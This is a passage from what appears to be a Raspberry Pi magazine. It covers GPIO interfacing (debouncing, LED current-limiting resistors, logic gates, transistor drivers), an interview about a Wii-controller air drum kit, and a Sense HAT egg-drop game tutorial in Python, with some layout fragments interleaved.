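print(debounce(raw))  # [(0.0, 'closed'), (0.5, 'open')] - one clean press
```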

Use multi-way switches

A multi-way rotary switch is handled in just the same way as a single-way switch except that it connects to several GPIO pins and requires the interface circuitry described earlier for each of those pins. The circuit diagram shows how this would be done for a four-way switch. De-bounce capacitors aren’t included because bounce isn’t as much of a problem with a multi-way or toggle switch as it is with a push button, because of their mechanically latching nature.

Understand LED basics

An LED (light-emitting diode) is a component that produces light when a current flows through it. It’s a polarised device, so its anode must always be connected to the positive supply and its cathode to the negative supply. A fundamental property of an LED is its forward voltage, which is usually between 1.8V and 3.3V depending on its colour and type. An LED requires this voltage in order to illuminate. Also important is the recommended current, at which its brightness and so on will be quoted. All these parameters are shown in the LED’s specification sheet.

Limit the current

Turning on an LED from a GPIO pin involves configuring the pin as an output and then outputting a logic 1. This puts 3.3V on the pin, but this will probably exceed the LED’s forward voltage, thereby causing its maximum current to be exceeded, destroying the LED and possibly damaging the Pi. This is prevented by adding a series resistor which drops the excess voltage. The resistor must drop the difference between 3.3V and the LED’s forward voltage. The value is worked out using Ohm’s law, as described in the next step.

Use Ohm’s law

First you need to decide the drive current for the LED. This must be less than the LED’s recommended current and less than the GPIO pin’s maximum of 16mA. Also, the total current drawn from all GPIO pins must be less than 50mA. 10mA will often give enough light, even if the recommended current is greater. Ohm’s law is summarised as V = I R. This can be rearranged as R = V / I to give the value of the resistor, R, where V is the voltage that needs to be dropped (ie 3.3V minus the LED’s forward voltage), and I is the drive current. For example, a forward voltage of 2.0V and a current of 10mA (0.01A) will require a value of (3.3 – 2.0) / 0.01 = 130 ohms.

Resistor and capacitor values

Often, the values of resistors and capacitors are not critical, and typical values can be used. However, when interfacing an LED, you must work out the value of the current-limiting resistor. Often you’ll find that you can’t buy a resistor of the value you’ve calculated, because resistors (and capacitors) only come in certain preferred values. In the common E-12 series, these values are 1.0, 1.2, 1.5, 1.8, 2.2, 2.7, 3.3, 3.9, 4.7, 5.6, 6.8 and 8.2. However, you may come across additional values from other series. These values can be multiplied by powers of ten. So, in the case of resistors, in addition to 4.7, for example, you’ll find 47, 470, 4.7k, 47k, 470k and 4.7M. If a resistor isn’t available in a value you calculated, the general rule is to play it safe. In the case of an LED current-limiting resistor, this means picking the closest larger value.
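The Ohm’s law calculation, together with the E-12 ‘pick the next larger value’ rule, is easy to check in Python (the helper names are ours, purely for illustration):

```python
def led_resistor(supply_v, forward_v, current_a):
    """Ohm's law rearranged: R = V / I, where V is the voltage to drop."""
    return (supply_v - forward_v) / current_a

# E-12 preferred values, multiplied by powers of ten to cover real resistors
E12 = [1.0, 1.2, 1.5, 1.8, 2.2, 2.7, 3.3, 3.9, 4.7, 5.6, 6.8, 8.2]

def next_preferred(r):
    """Smallest E-12 preferred value >= r (playing it safe for an LED)."""
    return min(m * 10 ** e for e in range(7) for m in E12 if m * 10 ** e >= r)

r = led_resistor(3.3, 2.0, 0.010)   # the worked example: 130 ohms
print(round(r), next_preferred(r))  # prints: 130 150.0
```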


White and blue LEDs

Some LEDs – mainly blue, white and ‘pure green’ – have forward voltages higher than 3.3V, so they can’t be driven directly from a GPIO pin. Even if the value is specified as 3.3V, driving it directly from a GPIO pin would not be safe or reliable. The solution is to drive it from a higher voltage, as discussed later in the ‘Exceed limits safely’ section (page 66).



Secrets of Pi interfacing

LOGIC CIRCUITRY EXPLAINED Understand logic circuitry to add extra functionality to your interface Since the processor in the Raspberry Pi can carry out any imaginable logic operation, it might be reasonable to assume that there’s no benefit to be gained from using external logic circuitry. While this would be true if the Pi has sufficient GPIO pins for your application, if you’re getting close to the limit then by using external hardware logic, you can reduce the number of pins needed. Our step-by-step guide provides some examples of how to do this; here we provide an introduction to logic circuitry.


Logic components operate on two voltages that represent the binary values of 0 and 1 although, for some applications, it might be more appropriate to think of them as off and on respectively. In the case of the Pi’s GPIO pins, 0 is represented by 0V (GND) while 1 is represented by 3.3V. With other singleboard computers that use a 5V supply, 0 is still represented by 0V, but 1 is represented by 5V. You should choose a family of logic chips (see ‘IC logic families’) to match the supply voltage of your computer.


The simplest logic component is the inverter, which has one input and one output – see the diagrams for symbols of all logic gates. As the name suggests, its function is to invert the value on its input; so, if the input is 0 then the output will be 1 and if the input is 1 then the output will be 0. The operation of a logic component is often defined by a truth table and, while it’s barely necessary in this simple case, the truth table for an inverter appears here:

Input  Output
0      1
1      0

Understanding logic symbols

The diagram shows the standard symbols for the various logic gates. Each of these has one or more inputs at the left and a single output at the right. You’ll notice that some symbols have little circles on their outputs. These are gates that have inverted outputs. So, for example, the symbol for a NAND gate (which means Not AND) is the same as that for an AND gate except for its inverted output. Most other logic devices, for example a 2-to-4 decoder, are just shown as square or rectangular boxes, again usually with the inputs on the left and the outputs on the right. Because so many different devices would otherwise look the same when shown as boxes, these symbols are usually annotated with their part number (eg 74HC138) and the various inputs and outputs are labelled with their function and usually their pin numbers. Logic devices connect to 0V and a power supply and, while these connections usually appear on more complicated logic devices, they aren’t normally shown on gates.

Next up after the inverter is a group of logic components referred to as gates. Gates can have any number of inputs (although two is the most common), and one output. To set the ball rolling we’ll look at the 2-input AND gate, the function of which can be summed up as follows. If input 1 is 1 AND input 2 is 1 then the output is 1; all other combinations of the inputs result in an output of 0. Using a similar statement, we can sum up the function of the OR gate as follows. If input 1 is 1 OR input 2 is 1 then the output is 1; all other combinations of input (actually there is only one other combination) result in an output of 0. Truth tables for the 2-input AND gate and the 2-input OR gate appear here.

AND:
Input 1  Input 2  Output
0        0        0
0        1        0
1        0        0
1        1        1

OR:
Input 1  Input 2  Output
0        0        0
0        1        1
1        0        1
1        1        1


The phrases NAND gate and NOR gate might sound odd at first. However, if we point out that NAND means Not AND, and that NOR means Not OR, then the pieces start to fall into place. A NAND gate is effectively an AND gate with an inverter connected to its output, and its truth table is the same as that for the AND gate but with the 0s in the output column changed to 1s and vice versa. Similarly, a NOR gate is an OR gate with an inverter connected to its output, so its truth table is the same as that for the OR gate, again with the 0s and 1s swapped in the output column. The one remaining type of gate is the XOR gate, which stands for eXclusive OR, and its truth table appears here.

XOR:
Input 1  Input 2  Output
0        0        0
0        1        1
1        0        1
1        1        0
You’ll notice that it’s almost the same as the truth table for the OR gate, differing only in that the output is 0 when both inputs are 1. Another way of looking at its function is that its output is 1 when the inputs are different; otherwise the output is 0.
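All five gates can be checked with ordinary Python operators (no hardware needed; this simply mirrors the truth tables above):

```python
AND  = lambda a, b: a & b
OR   = lambda a, b: a | b
NAND = lambda a, b: 1 - (a & b)   # Not AND
NOR  = lambda a, b: 1 - (a | b)   # Not OR
XOR  = lambda a, b: a ^ b         # output is 1 when the inputs differ

# Print the full truth table for all five gates
for a in (0, 1):
    for b in (0, 1):
        print(a, b, "->", AND(a, b), OR(a, b), NAND(a, b), NOR(a, b), XOR(a, b))
```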

IC logic families

One of the most common types of logic devices is the 7400 series. These have part numbers of the form 74<family><id>, where <family> is the 7400 series family and <id> is a number that defines the function. There might also be letters at the start and end, but you can ignore those. SN74LS00N, for example, is a low-power Schottky family device (LS) and its function (00) is a quad 2-input NAND gate (ie each chip contains four 2-input NAND gates). There are several 74 series families and most are not suitable for wiring directly to the Pi’s GPIO pins. Some won’t work with 3.3V inputs and outputs, and several are only available in surface-mounting packages, which are difficult for amateurs to wire up. Our recommendation is the 74HC family, which is 3.3V compatible and is available in through-hole packages.

The inverter and the various types of gate are the most fundamental logic components, but they’re just the tip of the iceberg. Dozens of other components are available, although in reality nearly all of their functionality could be duplicated by some combination of the basic logic components. Most of these components have symbols that are just rectangular boxes with their inputs and outputs labelled, so you’d need to consult the truth tables, which appear in their specification sheets, to understand their function. Because we’re going to use it later in the step-by-step, we’ll look at just one example, which goes by the name 2-to-4 decoder. The truth table of one of the two 2-to-4 decoders in the 74HC139 chip appears here (X means ‘either 0 or 1’).

Inputs        Outputs
E  A1 A0      Y3 Y2 Y1 Y0
1  X  X       1  1  1  1
0  0  0       1  1  1  0
0  0  1       1  1  0  1
0  1  0       1  0  1  1
0  1  1       0  1  1  1
First, the device has a so-called enable input, E. The device is only enabled if this input is at logic 0. If the device isn’t enabled, all its outputs will be high. Once enabled, one of the four outputs will go to logic 0 depending on the binary number on the inputs A0 and A1. So, for example, inputs of 1 and 0 (binary 10 = decimal 2) will result in a logic 0 on output Y2.
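The behaviour just described can be modelled in a few lines (a sketch of one half of a 74HC139, not a timing-accurate model; the function name is ours):

```python
def decode_2to4(e, a1, a0):
    """Active-low enable E; returns active-low outputs (Y3, Y2, Y1, Y0)."""
    if e == 1:                    # not enabled: all outputs high
        return (1, 1, 1, 1)
    selected = a1 * 2 + a0        # binary value on the A inputs
    return tuple(0 if 3 - i == selected else 1 for i in range(4))

print(decode_2to4(0, 1, 0))  # inputs 1 and 0 (decimal 2): Y2 low -> (1, 0, 1, 1)
```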



Secrets of Pi interfacing

WORK WITH LOGIC GATES TO USE FEWER GPIO PINS Logic circuitry can allow you to connect more devices to the Pi’s limited GPIO pins


Use a logic simulator

Before looking at some examples of logic circuitry, here’s a tip to help you check your ideas out without wiring anything up at all. If you’re not quite sure which logic devices you need, this will allow you to be sure before placing an order for components. The secret is to use a logic simulator and there are lots to choose from, some that run locally under various operating systems and some that run online. Here we’re testing the circuit from Step 6 at


Use a 2-to-4 decoder

Driving four LEDs usually requires four GPIO pins. However, if we have an application where only one of them needs to be illuminated at any one time, as might be the case if the LEDs were indicating a status, we can make do with just two GPIO pins. This is achieved using a 2-to-4 decoder. As we’ve already seen, this outputs a logic 0 on one of its four outputs depending on the binary value on its inputs. A 74HC139 chip contains two 2-to-4 decoders and the diagram shows one driving four LEDs.

Invert the outputs

The previous diagram shows how a 2-to-4 decoder can be connected to two GPIO pins and provides four signals. However, the outputs are ‘active low’, so if LEDs were wired directly to the outputs, all would be lit except for the one represented by the binary input value. One way to have just the one LED lit at any one time is to use inverters, as shown in the diagram. A 74HC04 chip contains six inverters.

Connect LEDs to 3.3V

As a simpler alternative to inverting the outputs of logic devices with active low outputs, LEDs can be connected to 3.3V instead of 0V. We’ve already seen how driving an LED connected to 0V with a 3.3V signal will illuminate it, and exactly the opposite is also true. The diagram shows an LED wired in this configuration; it will be lit if a logic 0 is applied to it, either directly from a GPIO pin or from an external logic device.

Implement a bar display (1)

A bar display, like those sometimes seen on audio equipment, demonstrates the flexibility of external logic. We need to light no LEDs, one LED, two LEDs and so on up to four LEDs depending on a 2-bit binary value output on GPIO pins. This uses a 74HC139 again. The diagram is the first stage in providing this functionality and you’ll notice that, although similar to the circuit in Step 3, a third GPIO pin is also used to drive the enable pin so that all the LEDs can be turned off.


Implement a bar display (2)

So far we have a circuit much like that in step 3, but with a means of turning off all the LEDs. The circuit in this step shows how adding three AND gates causes binary 00 to drive LED 1; binary 01 to drive LEDs 1 and 2; binary 10 to drive LEDs 1, 2 and 3; and binary 11 to drive LEDs 1, 2, 3 and 4. Looking back at the truth table for the AND gate, it should be fairly clear how this circuit achieves this.
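Behaviourally, the finished bar display does this (a sketch of the circuit’s overall effect, not of the individual gates; names are illustrative):

```python
def bar_leds(value, enabled=True):
    """2-bit value 0-3 lights LEDs 1..value+1; disabling turns them all off."""
    if not enabled:
        return [0, 0, 0, 0]
    return [1 if value >= i else 0 for i in range(4)]

print(bar_leds(2))         # [1, 1, 1, 0]: binary 10 lights LEDs 1, 2 and 3
print(bar_leds(0, False))  # [0, 0, 0, 0]: all off via the enable pin
```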


Drive a seven-segment LED

Driving a seven-segment LED without external logic requires seven GPIO pins plus an eighth if you want to drive the decimal point. This can be reduced to four or five respectively by using a 74HC4511. This seven-segment encoder turns on the appropriate LEDs in the seven-segment display depending on the 4-bit binary value on its inputs. An interesting exercise is to work out how to drive a 4-digit seven-segment display – it doesn’t need four times as many GPIO pins if you multiplex them.


Connect unused inputs

Very often when you use logic chips, only part of the chip will be used. For example, if you use a 74HC00 quad NAND gate and you use only two of the four gates, two of them will be left unused. This is not a problem, but you shouldn’t leave unused inputs unconnected as they can oscillate, causing the chip to draw an excessive current and overheat. The solution is to wire any unused inputs to either 3.3V or 0V. Unused outputs are fine and should be left unconnected.

Encode a switch

It’s not just outputs driving LEDs that can benefit from logic. By definition, a multi-way switch can only have one of its positions closed at once, so the output from a 4-way switch can be encoded as a 2-bit binary number. This is the opposite of the decoding that we saw in Step 2. A chip that can do this is the 74HC148, which is actually an 8-to-3 line encoder, but we can use it as a 4-to-2 bit encoder by wiring its four unused inputs to 3.3V.

Use 5V logic

Occasionally you’ll want to interface to 5V logic circuitry, which you can’t connect directly to your Pi. There are several level converter chips, but most are unidirectional. However, Texas Instruments’ TXB0102, TXB0104 and TXB0108 chips (2, 4 and 8 channels, respectively) are bidirectional, which means that they’ll work whether the GPIO pins are configured as inputs or outputs. The Texas devices are fiddly surface-mount chips, but several companies offer the TXB0104 and TXB0108 on breakout boards, which are much easier to handle.

Power supplies

If your interface circuitry and external devices require a supply of 3.3V or 5V, it can be provided by pins on the GPIO header. Even so, if you have a significant amount of external circuitry, it would be good practice to wire capacitors between the supply and ground to avoid fluctuations to the supply that could cause the circuit to malfunction. Use a single 100µF capacitor plus several 100nF ceramic capacitors, one per IC in your circuit, wired close to those ICs. If you need a supply other than 3.3V and 5V, the easiest solution is to use a battery or, perhaps, a pack of several 1.5V AA batteries. If you need a voltage that can’t easily be obtained with batteries, or you want to create several supply voltages from one battery, you can use a component called a voltage regulator.


Secrets of Pi interfacing

EXCEED LIMITS SAFELY Interface devices that exceed the GPIO’s maximum voltage or current rating

Interfacing an output device such as an LED to a GPIO pin requires that the device doesn’t require more than 3.3V and it doesn’t draw more than a GPIO pin’s maximum 16mA current. Devices such as electric motors and blue or white LEDs, that require a higher voltage supply and/or draw a higher current, need special treatment. The solution is to use a transistor, which can be thought of as an electronic switch. A small current from a GPIO pin turns the transistor on or off, thereby turning on or off a separate circuit involving a higher voltage and often a higher current than a GPIO pin can supply. This secondary circuit might use the 5V on the GPIO header as its supply but, if a higher voltage is required or the current will be higher than the GPIO header can supply, an external power supply will be needed. The circuit diagram shows the general configuration. When 3.3V is applied to the transistor’s base via the resistor, it will turn on, a condition that you can think of as the transistor’s emitter being connected directly to its collector. This means that a current can flow from the high voltage supply, through the load (ie motor, blue LED etc) to 0V and so the motor will spin or the LED will illuminate. Choosing the type of transistor and the value of the resistor is quite an involved process, especially since there is such a staggering choice of different transistors. While we can’t fully cover this topic here, we can give some

pointers. First of all, in the circuit shown, the transistor must be of the type referred to as an NPN bipolar transistor. Transistors of this type will also be defined by their gain and the maximum current and voltage you can use on the emitter-collector circuit. This is where it starts to get involved, but let’s just say that for voltages up to 24V and currents up to 250mA (conservative limits), a BC337 would be ideal. With this type of transistor and for this current, a 1k resistor would be suitable. Finally, if your load is a motor or a relay, it is important to wire a diode in parallel with the load (cathode to the supply) to suppress the reverse currents which these components can generate and which could destroy the transistor. A 1N4148 would be suitable.
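As a rough sanity check on the suggested values (textbook figures only: the V_BE ≈ 0.7V base-emitter drop is an assumption, and a real design should consult the transistor’s datasheet):

```python
v_gpio, v_be = 3.3, 0.7   # GPIO high level and a typical base-emitter drop
r_base = 1000             # the 1k base resistor suggested above
i_base = (v_gpio - v_be) / r_base
print(f"{i_base * 1000:.1f} mA base current")  # 2.6 mA, well under the 16mA pin limit
```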

Interface to mains equipment

Designing circuitry to control mains equipment isn’t difficult but, if something goes wrong, you could destroy your Pi or electrocute yourself. There are HATs that you can buy for this purpose, but we don’t recommend these either, since the mains terminals are close to the lower-voltage circuitry. If a wire comes loose, therefore, you could set your Pi on fire, blow up a component, firing shrapnel into your face, or leave high voltages precariously close to your fingers.

For this reason, we recommend that you use off-the-shelf interfaces in which the only connection to the mains-powered devices is through a domestic-style 13A socket. Energenie (energenie4u.co.uk) offers 13A remote-controlled sockets that can be used with a radio-controlled handset rather like a TV remote control. Alternatively, they can be used with a radio transmitter module, designed for the Pi, which can also be obtained from Energenie. A starter kit comprising two sockets and one Pi interface costs £21.99 including VAT and delivery.



Motion tracking

To help get the controller tracking in place, David had to use TkInter. The app he made enabled him to factor in both the movement and speed of the controller, with different sounds achievable based on certain combinations of these factors

Trigger support

To get three sounds on each controller, David had to use the triggers as the primary component for the third sound. The pressing of the trigger, along with a specific motion of the controller, helps give off the sound of a cymbal or extra drum

Controller compatibility

Response time

One of the key factors about the project was to make sure that the sound response time was kept to a minimum. The Raspberry Pi 3 proved to be the perfect fit here, helping turn motion and triggers from the controllers into one of the implemented drum sounds

Right Both motion and speed are tracked directly by the Pi unit, which helps to then trigger the drum and cymbal sounds achieved by the controllers Below The project started from David’s purchase of a Silverlit Air Drum Kit, which was heavily modified for compatibility with the Raspberry Pi unit

Components list ■ Raspberry Pi 3 ■ Nintendo Wii controllers ■ Silverlit Air Drum Kit ■ Python cwiid library ■ TkInter ■ Open-source drum samples


David detailed that getting two controllers to work simultaneously was one of the biggest issues. He had to do some heavy tinkering with each controller’s MAC addresses to get them both working with the Pi, and in tandem with one another

My Pi project

Raspberry Pi air drum kit

David Pride’s air drum kit turns the Raspberry Pi into a musical maestro

Where did the original idea for the drum kit stem from? What’s always interesting to me is where we find our sources of inspiration. These can be a person, a book, a tweet, a website – anything at all. A lot of my project ideas start when I find something at the local car boot sale. This time what I found was an Air Play ‘Air Drum’ – being offered for the grand sum of £1! How could I possibly refuse? So I took it home and had a quick play and, to be honest, while the concept is great, the actual functionality was a bit limited, the sound quality was rubbish and it was also a bit suspect as to what sound played with what movements.

How was the build process? Did you encounter any issues? This got me thinking about whether I could make something more effective using a Raspberry Pi. We’ve been playing around with Wii controllers at both Cotswold Raspberry Jam and Cheltenham Hackspace recently. We’ve built several mini-bots for a bot-versus-bot challenge known as ‘Pi Noon’. Neil Caucutt from Cheltenham Hackspace has done an amazing job designing the chassis for these bots. They use the excellent Python cwiid library that lets you use Wii controllers with the Raspberry Pi. I’d only ever managed to get one controller working with a single Pi before, so the first challenge was to get a pair of controllers working as the ‘sticks’. Once I’d identified that, by using the MAC address of each controller, multiple controllers can be ‘read’ by a single Pi, I was able to set up two controllers as a pair of drum sticks.

How are controller movements actually tracked? I found a bunch of open source drum samples that were available as .wav files – there are literally thousands of these out there to choose from. I then wrote a small TkInter app that displayed the position of the controller to give me an idea of the data that was being produced. Interestingly, the position and accelerometer data from the Wii controller is all wrapped up in a single xyz Python tuple. This caused some confusion initially, as moving slowly from point A to point B produces a very different reading from making the same movement rapidly. After playing around for a while (quite a long while!), I managed to map four distinct movements to four different drum sounds.

"What I found was an Air Play 'Air Drum' – being offered for the grand sum of £1! How could I refuse?"

Were there any limits to the sounds you can implement?
I initially wanted to get three sounds on each controller, but the movement scale was a bit too tight to do it successfully every time and two sounds often overlapped. So, I am using the trigger button combined with the movement for one of the sounds on each controller. This gives six different drum sounds, three per controller, that can be played easily without them overlapping.

Did you find the Pi a good board?
I found the response time to be very acceptable on a Pi 3. I posted the code to GitHub and others have also been having fun with it. I've seen one version that uses my controller code and PyGame to play the sound files; this seems to work better on older versions of the Pi.

Is there any way you see this project being expanded on? Integrating more sounds perhaps?
In regards to what else could be done, I am interested in seeing if the actual mechanics from the Wii controllers could be mounted in a pair of gloves; this could be a really interesting experiment. Additionally, I'd like to configure a more refined output that can generate MIDI signals rather than just playing stock sound files; this would really open up a whole range of different possibilities.

Many of our readers will know about your Pi exploits. What's next for you? Any big projects in the pipeline?
In regards to what comes next, I am very fortunate in that I've just got my hands on a 3D printer, so I have been having a lot of fun experimenting with that. I've designed a LEGO-compatible case for the tiny Raspberry Pi Zero, which is proving extremely popular. I've also been selected to take part in Pi Wars, the Raspberry Pi robotics competition that takes place in April 2017, so I'll be doing a lot of preparation for that event too in the coming months.

David Pride

is a Raspberry Pi devotee who has played a major role in Pi-centric events throughout the UK.

Like it?

David has been massively involved with the Pi community for a number of years, and we've featured several of his projects previously. We highly recommend you check out his Connect 4 robot, which was another novel way of integrating the Raspberry Pi into a different type of project: http://bit.ly/2fbsSnW

Further reading

While the air drum kit may be a niche project to undertake, David explains that it is very much a beginner-friendly project to get started with. A visual look at the project can be found over at: http://, while all the necessary code can be yours from his official GitHub listing: http://



Make an egg-drop game with the Sense HAT

Use the same hardware that Major Tim Peake used on the ISS and code your own drop-and-catch game

Dan Aldred

is a Raspberry Pi Certified Educator and a Lead School Teacher for CAS. He led the winning team of the Astro Pi Secondary School contest and appeared in the DfE’s ‘inspiring teacher’ TV advert. Recently he graduated from Skycademy, launching a Raspberry Pi attached to a high altitude balloon to over 31,000 metres into the stratosphere.

Some of the most basic and repetitive games are the most fun to play. Consider Flappy Bird, noughts and crosses or even catch. This tutorial shows you how to create a simple drop-and-catch game that makes excellent use of some of the Sense HAT's features. Start off by coding an egg – a yellow LED – to drop each second, and a basket – a brown LED – on the bottom row of LEDs. Use the Sense HAT's accelerometer to read and relay back when you tilt your Sense HAT left or right, enabling you to move the basket toward the egg. Successfully catch the egg and you play again, with a new egg being dropped from a random position… But, if you miss one, then it breaks and it's game over! Your program will keep you up to date with how you are progressing, and when the game ends, your final score is displayed. If you don't own a Sense HAT, you can use the emulator that is available on the Raspbian with PIXEL operating system. You can also see the Egg Drop game in action here:


Import the modules

First, open your Python editor and import the SenseHAT module, line 1. Then import the time module, line 2, so you can add pauses to the program. The random module, line 3, is used to select a random location from the top of the LEDs, from which the egg will drop. To save time typing ‘SenseHAT’ repeatedly, add it to a variable, line 4. Finally, set all the LEDs to off to remove the previous score and game data, line 5.

from sense_hat import SenseHat
import time
import random
sense = SenseHat()
sense.clear()


■ Sense HAT
■ Raspbian with PIXEL OS with Sense HAT emulator

game_over = False
basket_x = 7
score = 0


Measure the basket movement: part 1

The basket is controlled by tilting your Sense HAT to the left or right, which alters the pitch. Create a function to hold the code that will respond to the movement and move the basket. On line 1, name the function; it takes the pitch reading and the position of the basket, basket_x. Use sense.set_pixel to turn off the LED at the basket's current position on the bottom row of the matrix, line 2, so the basket can be redrawn in its new position. Then, on line 3, copy the current position of the basket into new_x, which is updated when the function runs again. This updates the variable with the new position of the basket so the corresponding LED can be turned on, which has the effect of making the basket look like it has moved.

def basket_move(pitch, basket_x):
    sense.set_pixel(basket_x, 7, [0, 0, 0])
    new_x = basket_x

Set the variables

Next, create the variables to hold the various game data. On line 1, create a global variable to hold the status of the game. This records whether the game is in play or has ended. The global keyword enables the status to be used later on in the game with other parts of the program. On line 2, create another variable to hold your game score. Set the game_over variable to False; this means the game is not over. The position of each LED on the matrix is referred to by the co-ordinates x and y, with the top line being number 0, down to number 7 at the bottom. Create a variable to hold the position of the basket, which is set on the bottom line of the LEDs, number 7. Finally, set the score to zero.

global game_over
global score


What you’ll need


Measure the basket movement: part 2

The second part of the function consists of a conditional which checks the pitch and the basket's current position. If the pitch is between a value of 1-179 and the basket is not at position zero, then the Sense HAT is tilted to the right and therefore the basket is moving to the right. The second condition checks that the value is between 359 and 179, which means that the tilt is to the left, line 3. The last line of code returns the x position of the basket so it can be used later in the code – see Step 13.

Johan Vinet has some excellent and inspirational examples of 8×8 pixel art, which include some famous characters and will show you what you can create with 64 pixels of colour.

if 1 < pitch < 179 and basket_x != 0:
    new_x -= 1
elif 359 > pitch > 179 and basket_x != 7:
    new_x += 1
return new_x,
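If you want to check the tilt logic without a Sense HAT attached, the same conditional can be exercised as a pure function. This is just a hardware-free sketch of the step above; the function name next_basket_x is ours, not part of the tutorial code.

```python
# Hardware-free sketch of the tilt logic above: pitch values between
# 1 and 179 move the basket towards x = 0, values between 179 and 359
# move it towards x = 7, and the basket never leaves the 0-7 range.

def next_basket_x(pitch, basket_x):
    if 1 < pitch < 179 and basket_x != 0:
        return basket_x - 1
    elif 359 > pitch > 179 and basket_x != 7:
        return basket_x + 1
    return basket_x

print(next_basket_x(90, 7))   # tilted: moves to 6
print(next_basket_x(270, 7))  # already at the edge: stays at 7
print(next_basket_x(0, 4))    # level: stays at 4
```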

Full code listing

from sense_hat import SenseHat
###Egg Drop###
###Coded by dan_aldred###
import time
import random
sense = SenseHat()
sense.clear()
global game_over
global score
game_over = False
basket_x = 7
score = 0
'''main pitch measurement'''
def basket_move(pitch, basket_x):
    sense.set_pixel(basket_x, 7, [0, 0, 0])
    new_x = basket_x
    if 1 < pitch < 179 and basket_x != 0:
        new_x -= 1
    elif 359 > pitch > 179 and basket_x != 7:
        new_x += 1
    return new_x,


Create images for your game

Images are built up of pixels that combine to create an overall picture. Each LED on the matrix can be automatically set from an image file. For example, an image of a chicken can be loaded, the colours and positions calculated, and then the corresponding LEDs enabled. The image needs to be 8×8 pixels in size so that it fits the LED matrix. Download the test picture file, chicken.png, and save it into the same folder as your program. Use the code here in a new Python window to open and load the image of the chicken (line 3). The Sense HAT will do the rest of the hard work for you.

from sense_hat import SenseHat
sense = SenseHat()
sense.load_image("chicken.png")


'''Main game setup'''
def main():
    global game_over
    '''Introduction'''
    sense.show_message("Egg Drop", text_colour = [255, 255, 0])
    sense.set_rotation(90)
    sense.load_image("chick.png")
    time.sleep(2)
    sense.set_rotation()
    '''countdown'''
    countdown = [3, 2, 1]
    for i in countdown:
        sense.show_message(str(i), text_colour = [255, 255, 255])
    basket_x = 7
    egg_x = random.randrange(0,7)
    egg_y = 0
    sense.set_pixel(egg_x, egg_y, [255, 255,

Create your own 8×8 image

The simplest method to create your own image for the LEDs is a superb on-screen program that enables you to manipulate the LEDs in real-time. You can change the colours, rotate them and then export the image as code or as an 8×8 PNG file. First, you need to install the Python PNG library; open the Terminal window and type:

sudo pip3 install pypng

After this has finished, type:

git clone RPi_8x8GridDraw

Once the installation has completed, move to the RPi folder:

    0])
    sense.set_pixel(basket_x, 7, [139, 69, 19])
    time.sleep(1)
    while game_over == False:
        global score
        '''move basket first'''
        '''Get basket position'''
        pitch = sense.get_orientation()['pitch']
        basket_x, = basket_move(pitch, basket_x)
        '''Set Basket Position'''
        sense.set_pixel(basket_x, 7, [139, 69, 19])
        time.sleep(0.2)

cd RPi_8x8GridDraw


Now enter the command:

python3

…to run the application.

sense.show_message("Egg Drop", text_colour = [255, 255, 0])


Display your start image

Once the start message has scrolled across the Sense HAT LED matrix, you can display your game image, in this example a chicken. Due to the orientation of the Sense HAT and the location of the wires, you'll need to rotate it through 90 degrees so it faces the player, line 1. Load the image with the code sense.load_image, line 2. Display the image for a few seconds using time.sleep(), line 3. Note that the lines from now on are indented in line with the previous line.

sense.set_rotation(90)
sense.load_image("chick.png")
time.sleep(2)
sense.set_rotation()


Create and export your image

The Grid Editor enables you to select from a range of colours displayed down the right-hand side of the window. Simply choose the colour and then click the location of the LED on the grid; select ‘Play on LEDs’ to display the colour on the Sense HAT LED. Clear the LEDs using the Clear Grid button and then start over. Finally, when exporting the image, you can either save as a PNG file and then apply the code in the previous step to display the picture, or you can export the layout as code and import that into your program.
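When you export the layout as code rather than a PNG, what you get is essentially a flat list of 64 RGB triples that the Sense HAT's sense.set_pixels() call understands. As a sketch (the colours and the egg design here are our own, not output from the Grid Editor), such an image can also be written by hand:

```python
# An 8x8 image as a flat list of 64 [R, G, B] triples - the format
# sense.set_pixels() expects. Y/K names and the egg shape are
# illustrative choices, not from the tutorial.

Y = [255, 255, 0]  # yellow (egg)
K = [0, 0, 0]      # black (LED off)

egg_image = [
    K, K, K, Y, Y, K, K, K,
    K, K, Y, Y, Y, Y, K, K,
    K, K, Y, Y, Y, Y, K, K,
    K, Y, Y, Y, Y, Y, Y, K,
    K, Y, Y, Y, Y, Y, Y, K,
    K, Y, Y, Y, Y, Y, Y, K,
    K, K, Y, Y, Y, Y, K, K,
    K, K, K, Y, Y, K, K, K,
]

print(len(egg_image))  # one triple per LED: 64
# On a real Sense HAT you would then call: sense.set_pixels(egg_image)
```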


Count down to the game starting

Once the start image has been displayed, prepare the player to get ready for the game with a simple countdown from three to one. First create a list called countdown, which stores the values 3, 2, and 1, line 1. Use a for loop, line 2, to iterate through each of the numbers and display them. This uses the code sense.show_message(str(i) to display each number on the LEDs. You can adjust the colour of the number using the three-part RGB values, text_colour = [255, 255, 255]), line 3.

countdown = [3, 2, 1]
for i in countdown:
    sense.show_message(str(i), text_colour = [255, 255, 255])


Display a message: the game begins

Now you have an image, you are ready to create the function that controls the whole game. Create a new function, line 1, called main, and add the code:

sense.show_message

…to display a welcome message to the game, line 3. The values 255, 255 and 0 refer to the colour of the message (in this example, yellow). Edit these to choose your own preferred colour.

def main():
    global game_over


Set the egg and basket

As the game starts, set the horizontal position, the 'x' position, of the basket to 7; this places the basket in the bottom right-hand corner of the LED matrix. Now set the x position of the egg at a random position between 0 and 7, line 2. This is at the top of the LED matrix and ensures that the egg does not always fall from the same starting point. Last, set the egg's y value to 0 to ensure that the egg falls from the very top of the LED matrix, line 3.

basket_x = 7
egg_x = random.randrange(0,7)
egg_y = 0


Display the egg and basket

In the previous step, you set the positions for the egg and the basket. Now use these variables to display them. On line 1, set the egg using the code sense.set_pixel followed by its x and y co-ordinates. The x position is a random position between 0 and 7, and the y is set to 0 to ensure that the egg starts from the top. Next, set the colour to yellow (unless your egg is rotten, in which case set it to green, (0, 255, 0)). Next, set the basket position using the same code, line 2, where the x position is set to 7 to ensure that the basket is displayed in the bottom right-hand LED. Set the colour to brown using the values 139, 69, 19.

sense.set_pixel(egg_x, egg_y, [255, 255, 0])
sense.set_pixel(basket_x, 7, [139, 69, 19])
time.sleep(1)


Move the basket: part 1

Begin by checking that the game is still in play (the egg is still dropping) by checking that the game_over variable is False, line 1. On line 2, import the score. Next, take a reading of the 'pitch' of the Sense HAT using the code sense.get_orientation()['pitch'], line 3. This value is passed to the function you created in steps 4 and 5. The final line of code uses the function to turn off the LED that represents the basket, then looks at the value of the pitch, determining whether the Sense HAT is tilted to the left or right, and either adds or subtracts one from the x position of the current LED. This has the effect of selecting the LED adjacent to the current one, on the left or the right. Finally, update the basket_x value with the new position value.

while game_over == False:
    global score
    pitch = sense.get_orientation()['pitch']
